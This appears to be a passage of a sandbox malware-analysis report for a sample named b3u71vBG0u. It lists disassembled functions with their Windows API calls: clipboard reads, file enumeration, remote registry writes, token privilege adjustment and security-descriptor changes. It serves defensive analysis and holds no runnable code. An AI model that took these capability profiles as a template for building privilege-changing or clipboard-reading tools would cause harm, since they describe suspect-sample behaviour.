                    • SetCapture.USER32(?), ref: 007CD177
                    • ClientToScreen.USER32(?,?), ref: 007CD1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007CD1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007CD203
                    • ReleaseCapture.USER32 ref: 007CD20E
                    • GetCursorPos.USER32(?), ref: 007CD248
                    • ScreenToClient.USER32(?,?), ref: 007CD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007CD2B1
                    • SendMessageW.USER32 ref: 007CD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007CD31C
                    • SendMessageW.USER32 ref: 007CD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007CD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007CD37B
                    • GetCursorPos.USER32(?), ref: 007CD39B
                    • ScreenToClient.USER32(?,?), ref: 007CD3A8
                    • GetParent.USER32(?), ref: 007CD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 007CD431
                    • SendMessageW.USER32 ref: 007CD462
                    • ClientToScreen.USER32(?,?), ref: 007CD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007CD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 007CD51A
                    • SendMessageW.USER32 ref: 007CD53D
                    • ClientToScreen.USER32(?,?), ref: 007CD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007CD5C3
                      • Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 007CD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 3977979337-4164748364
                    • Opcode ID: 377698d43a07123a10e832e495ce466b7fa5fbcd537151a8fa5e40399b80da31
                    • Instruction ID: 7bc66f3969c82b2c9a21e152218cc75ed21140450ab2bd5f34f265fd2b4ba09d
                    • Opcode Fuzzy Hash: 377698d43a07123a10e832e495ce466b7fa5fbcd537151a8fa5e40399b80da31
                    • Instruction Fuzzy Hash: 22427B30204241AFD726CF68C848FAABBE5FF49314F14452DF6999B2A1D7399864CF92
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007C873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: bb47aa098b867484889e0b7be08478010fb59da51a11645fe65aefb252853f2e
                    • Instruction ID: 6aa8da21ac6aa5a1bb925bc3a02d46a7822caae170459c07bab7dcba3c67df24
                    • Opcode Fuzzy Hash: bb47aa098b867484889e0b7be08478010fb59da51a11645fe65aefb252853f2e
                    • Instruction Fuzzy Hash: F512DF71500248ABEB658F64CC49FAF7BB9EF85310F24412DF916EA2E1EF789941CB11
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oau$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-2223249883
                    • Opcode ID: 13eba9412650ddeb64d6462e6a58fcd4288c073659c427f174429501dcbda735
                    • Instruction ID: 0d4d184b8ccc3bd645e37e2c6bedaba030db7e214de23e5fbe023a155690c8db
                    • Opcode Fuzzy Hash: 13eba9412650ddeb64d6462e6a58fcd4288c073659c427f174429501dcbda735
                    • Instruction Fuzzy Hash: 3D93A371A04219DBDF24CF58E881BEDB7B1FF48310F25816AE945EB291E7789D82CB50
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00744A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0077DA8E
                    • IsIconic.USER32(?), ref: 0077DA97
                    • ShowWindow.USER32(?,00000009), ref: 0077DAA4
                    • SetForegroundWindow.USER32(?), ref: 0077DAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0077DAC4
                    • GetCurrentThreadId.KERNEL32 ref: 0077DACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0077DAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0077DAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0077DAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0077DAF8
                    • SetForegroundWindow.USER32(?), ref: 0077DAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB10
                    • keybd_event.USER32(00000012,00000000), ref: 0077DB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB25
                    • keybd_event.USER32(00000012,00000000), ref: 0077DB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB33
                    • keybd_event.USER32(00000012,00000000), ref: 0077DB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0077DB42
                    • keybd_event.USER32(00000012,00000000), ref: 0077DB47
                    • SetForegroundWindow.USER32(?), ref: 0077DB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 0077DB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: f6f63200a8b8247e6408078fabb968244d8ca2fa23515ab5fac8f4659a2507d5
                    • Instruction ID: 6d6aafa95d94b871c097172f7066e760d67eb106484c19cfdf4cf140806a0467
                    • Opcode Fuzzy Hash: f6f63200a8b8247e6408078fabb968244d8ca2fa23515ab5fac8f4659a2507d5
                    • Instruction Fuzzy Hash: 01314171A40318BAEF316FA19C49F7E3F7DEF44B90F118029FA04A61D0C6B85D10AAA4
                    APIs
                      • Part of subcall function 00798CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00798D0D
                      • Part of subcall function 00798CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798D3A
                      • Part of subcall function 00798CC3: GetLastError.KERNEL32 ref: 00798D47
                    • _memset.LIBCMT ref: 0079889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007988ED
                    • CloseHandle.KERNEL32(?), ref: 007988FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00798915
                    • GetProcessWindowStation.USER32 ref: 0079892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00798938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00798952
                      • Part of subcall function 00798713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00798851), ref: 00798728
                      • Part of subcall function 00798713: CloseHandle.KERNEL32(?,?,00798851), ref: 0079873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: d85682b6e639c6ac09575ed156695d89002211a35ad5ed6a9a016cf0e6b6619f
                    • Instruction ID: 97868a16d5041cd2fdeebae4d93fa7148e1d3224f58ba919dfefb0b004f64d07
                    • Opcode Fuzzy Hash: d85682b6e639c6ac09575ed156695d89002211a35ad5ed6a9a016cf0e6b6619f
                    • Instruction Fuzzy Hash: 7D816B71900209AFDF51DFA4EC49EEE7BB9EF05314F08816AF910B6261DB398E14DB61
                    APIs
                    • OpenClipboard.USER32(007CF910), ref: 007B4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 007B4292
                    • GetClipboardData.USER32(0000000D), ref: 007B429A
                    • CloseClipboard.USER32 ref: 007B42A6
                    • GlobalLock.KERNEL32(00000000), ref: 007B42C2
                    • CloseClipboard.USER32 ref: 007B42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007B42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 007B42EE
                    • GetClipboardData.USER32(00000001), ref: 007B42F6
                    • GlobalLock.KERNEL32(00000000), ref: 007B4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 007B4337
                    • CloseClipboard.USER32 ref: 007B4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: a40044d86857dd0bf581310e82da6512ba81ade6190d72997a307fa160a7f621
                    • Instruction ID: df8f51ab2f1d6061a0b28c7d2ea4d4b8c4195883e1ebf16076063392dc2c3f41
                    • Opcode Fuzzy Hash: a40044d86857dd0bf581310e82da6512ba81ade6190d72997a307fa160a7f621
                    • Instruction Fuzzy Hash: 75518371204301ABD711EF64EC89FAE77A9AF44B01F10852DF596D21A2DF78D904CB66
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 007AC9F8
                    • FindClose.KERNEL32(00000000), ref: 007ACA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007ACA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007ACA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007ACAAF
                    • __swprintf.LIBCMT ref: 007ACAFB
                    • __swprintf.LIBCMT ref: 007ACB3E
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                    • __swprintf.LIBCMT ref: 007ACB92
                      • Part of subcall function 007638D8: __woutput_l.LIBCMT ref: 00763931
                    • __swprintf.LIBCMT ref: 007ACBE0
                      • Part of subcall function 007638D8: __flsbuf.LIBCMT ref: 00763953
                      • Part of subcall function 007638D8: __flsbuf.LIBCMT ref: 0076396B
                    • __swprintf.LIBCMT ref: 007ACC2F
                    • __swprintf.LIBCMT ref: 007ACC7E
                    • __swprintf.LIBCMT ref: 007ACCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 578ab1df48215cb02efea6df9600cb8c3843d654fbfcf201fee30cc8831e1794
                    • Instruction ID: 3f0b56185a9f89e8de69deb7256f62108f8b8891c7e7f012151c28695021bf13
                    • Opcode Fuzzy Hash: 578ab1df48215cb02efea6df9600cb8c3843d654fbfcf201fee30cc8831e1794
                    • Instruction Fuzzy Hash: FAA1FDB1508305EBC714EB64C88ADAFB7ECEF95700F404919F686D7191EB38DA09CB62
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AF221
                    • _wcscmp.LIBCMT ref: 007AF236
                    • _wcscmp.LIBCMT ref: 007AF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 007AF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 007AF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 007AF291
                    • FindClose.KERNEL32(00000000), ref: 007AF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007AF2B8
                    • _wcscmp.LIBCMT ref: 007AF2DF
                    • _wcscmp.LIBCMT ref: 007AF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007AF308
                    • SetCurrentDirectoryW.KERNEL32(007FA5A0), ref: 007AF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007AF330
                    • FindClose.KERNEL32(00000000), ref: 007AF33D
                    • FindClose.KERNEL32(00000000), ref: 007AF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 7c0a2da5612747de0adc66a228d914dacf95d1e7318bef0bab8190625b6e2afd
                    • Instruction ID: 1851c8d5babab9318ec505238b7f1fb6db7a2a208509cc22fb276e21ee9b4217
                    • Opcode Fuzzy Hash: 7c0a2da5612747de0adc66a228d914dacf95d1e7318bef0bab8190625b6e2afd
                    • Instruction Fuzzy Hash: A431C3B65002196ADF10DBF4DC88EEE73ACAF8A361F104279E905D3090EB38DE45CA54
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,007CF910,00000000,?,00000000,?,?), ref: 007C0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007C0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007C0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 007C103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 007C104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: de6c2b53bf3912e059d751ebeda32cf2abe6e1181c9d0c65b360956372ffbe44
                    • Instruction ID: 1abc9cb66e1b594668df6643b242b1e73f2b71009483b42779e6c855feec1b37
                    • Opcode Fuzzy Hash: de6c2b53bf3912e059d751ebeda32cf2abe6e1181c9d0c65b360956372ffbe44
                    • Instruction Fuzzy Hash: 2F023975200651DFCB14EF24C885E2AB7E5EF89714F04896DF98A9B362DB38ED41CB81
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AF37E
                    • _wcscmp.LIBCMT ref: 007AF393
                    • _wcscmp.LIBCMT ref: 007AF3AA
                      • Part of subcall function 007A45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007A45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 007AF3D9
                    • FindClose.KERNEL32(00000000), ref: 007AF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007AF400
                    • _wcscmp.LIBCMT ref: 007AF427
                    • _wcscmp.LIBCMT ref: 007AF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007AF450
                    • SetCurrentDirectoryW.KERNEL32(007FA5A0), ref: 007AF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007AF478
                    • FindClose.KERNEL32(00000000), ref: 007AF485
                    • FindClose.KERNEL32(00000000), ref: 007AF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 61c5a8f3bdc7c6c670919affcaed963c07c65236fc284cd2f375ac7e907678a2
                    • Instruction ID: c30a10736f4666d54d22544af4b4e8da5e0fcf75c1f58755723b01840362da13
                    • Opcode Fuzzy Hash: 61c5a8f3bdc7c6c670919affcaed963c07c65236fc284cd2f375ac7e907678a2
                    • Instruction Fuzzy Hash: 9431D5715012596ECF109BA4EC88EEE77AD9F8A361F104379E814A31A0DB3CDE44CA64
                    APIs
                      • Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00798766
                      • Part of subcall function 0079874A: GetLastError.KERNEL32(?,0079822A,?,?,?), ref: 00798770
                      • Part of subcall function 0079874A: GetProcessHeap.KERNEL32(00000008,?,?,0079822A,?,?,?), ref: 0079877F
                      • Part of subcall function 0079874A: HeapAlloc.KERNEL32(00000000,?,0079822A,?,?,?), ref: 00798786
                      • Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0079879D
                      • Part of subcall function 007987E7: GetProcessHeap.KERNEL32(00000008,00798240,00000000,00000000,?,00798240,?), ref: 007987F3
                      • Part of subcall function 007987E7: HeapAlloc.KERNEL32(00000000,?,00798240,?), ref: 007987FA
                      • Part of subcall function 007987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00798240,?), ref: 0079880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079825B
                    • _memset.LIBCMT ref: 00798270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079828F
                    • GetLengthSid.ADVAPI32(?), ref: 007982A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 007982DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007982F9
                    • GetLengthSid.ADVAPI32(?), ref: 00798316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00798325
                    • HeapAlloc.KERNEL32(00000000), ref: 0079832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079834D
                    • CopySid.ADVAPI32(00000000), ref: 00798354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00798385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007983AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007983BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 825f2407e1c9cb99342158d357c493feabffb7fb1556399f424470dafdf3257b
                    • Instruction ID: 7a5116eb561cbd34984838952514d343cd861b64476dc9dca586f4a549858d6b
                    • Opcode Fuzzy Hash: 825f2407e1c9cb99342158d357c493feabffb7fb1556399f424470dafdf3257b
                    • Instruction Fuzzy Hash: 61613971904209EFDF00DFA4EC85EAEBBB9FF05700F14816AE815A6291DB399A05CB61
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
